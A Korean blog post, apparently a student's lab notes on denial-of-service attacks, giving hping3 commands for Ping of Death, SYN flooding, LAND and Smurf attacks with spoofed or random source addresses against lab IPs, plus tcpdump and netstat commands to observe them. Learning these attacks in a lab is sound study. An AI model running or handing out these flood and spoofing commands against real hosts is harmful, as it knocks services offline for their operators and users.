본문 바로가기
인프라 7기/네트워크 보안 공격 기법

Dos(Denial of Service: 서비스 거부) 공격

by 킹버거 2023. 5. 12.

굿 애프터눈...... 와.. 무진장 피곤한 금요일 오후예요. 

금요일이라 그런가 너무 피곤하네요...

눈을 부릅 뜨고.. 오늘은 DoS 공격을 공부해볼게요.

hping3을 이용한 ping of Death 공격

1) hping3 설치 (epel에서 제공)

# yum install -y hping3 

 

2) Ping of Death 실행 (공격자 시스템)

# hping --icmp --rand-source IP-d [패킷크기] --flood

 

-- icmp : 전송 패킷 종류

IP: 공격 대상

-d [숫자] : 전송 패킷의 길이 (최대 65,535) 

--flood: 최대 속도로 패킷 생성

--rand-source: 소스 IP를 랜덤하게 결정

-c: 패킷 개수

-a IP: spoofing source address

 

-flood 옵션을 주면 너무 많은 패킷 발생으로 인해 패킷 캡처가 어려울 수 있다.

제한이 있는 --fast(10개/sec)나 --faster(100개/sec)를 이용하는 것을 권장한다. 

 

EX) # hping --icmp -a 1.1.1.1 192.168.11.17 -d 65000

- 출발지가 1.1.1.1이고  크기가 65000인 ICMP 패킷을 192.168.11.17에게 전송하라.

 

3) tcpdump를 이용한 패킷 캡처 (공격대상자 시스템)

패킷을 수신한 192.168.11.17 호스트에서 tcpdump를 이용하여 패킷을 캡처한다.

# tcpdump src 1.1.1.1 -vv 

SYN Flooding을 이용한 DoS 공격 

서버는 SYN 패킷을 받으면 통신을 준비하기 위해 접속에 필요한 여러 정보들을 저장할 메모리나 버퍼 등을 할당한다. 하지만 SYN은 가짜이기 때문에 사용하지도 않으면서 할당된 자원들을 계속해서 붙잡고 있기 때문에 가용성이 떨어진다. 이를 이용한 공격이 SYN Flooding 공격이다. 

* SYN flooding의 공격 대상 : 특정 어플리케이션

 

1) SYN flooding 실행 

# hping --rand-source IP -p 포트 -S --flood

--rand-source: 소스 IP를 랜덤하게 결정

-p : 대상 포트번호

-S: SYN 패킷 

--flood: 최대 속도로 패킷 생성

 

EX) # hping --rand-source 192.168.11.17 -p 80 -S --flood

- 192.168.11.17의 80번 포트로 출발지 IP 주소가 랜덤인 SYN 패킷을 전송하라.

 

2)  tcpdump를 이용한 패킷 캡처 (공격대상자 시스템)

# tcpdump -i eth0 tcp port 80 -w synf.pcap

 

* 캡처 전에 HTTPD 서버가 구동 중인지 확인해야 한다.

 

3) netstat 명령으로 대기 접속을 확인한다.

#netstat -an | grep SYN_RECV

 

서버가 없으면 UDP는 ICMP unreachable 패킷을 보냄 

TCP는 모하지?? 모하냐 제현아. 알려줘라. 

LAND 공격

- 시스템을 나쁜 상태에 빠지게 하는 공격

- [공격 기법] 패킷을 전송할 때 출발지 IP 주소와 목적지 IP 주소에 공격 대상의 IP 주소를 적는다. 

- [보안 대책]

1) 시스템: 현재 시스템은 출발지 주소와 목적지 주소가 동일한 패킷 무시

2) 라우터/방화벽: 출발지 IP 주소가 내부 IP 주소와 동일한 패킷 차단

 

1) hping을 이용한 Land 공격 실행 (공격자 시스템)

# hping 192.168.11.11 -a 192.168.11.11 --icmp --flood

 

2) tcpdump icmp로 icmp패킷만 캡처 (공격대상자 시스템)

스머프(Smurf) 공격

# hping 192.168.10.255 -a 192.168.11.17 --icmp --flood

랜드, 스머프 공격 효과 없음 

 

os 패치가 안 되는 애들..........드럽게 안 되는 애들.......... 라우터 , 스위치.. 이런 애들 느려서

스머프 공격에 반응 하는 애들이 종종 있음. 

'인프라 7기 > 네트워크 보안 공격 기법' 카테고리의 다른 글

SSH 터널링과 은닉채널  (1) 2023.05.18
DDoS(Distributed Denial of Service) 공격 - Trinoo  (0) 2023.05.15
스푸핑 Spoofing [DNS 스푸핑]  (0) 2023.05.11
스푸핑 Spoofing [ARP 스푸핑]  (0) 2023.05.10
패스워드 크랙 (John the Ripper)  (0) 2023.05.10

관련글

티스토리툴바